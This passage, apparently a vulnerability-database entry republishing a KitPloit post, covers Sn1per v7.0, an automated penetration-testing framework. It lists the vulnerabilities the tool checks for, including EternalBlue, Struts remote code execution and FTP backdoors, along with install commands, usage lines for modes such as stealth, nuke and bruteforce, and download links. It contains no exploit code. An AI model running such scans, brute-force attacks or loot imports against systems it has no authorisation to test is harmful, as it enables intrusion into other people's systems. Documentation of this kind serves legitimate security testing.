SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP &amp; HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}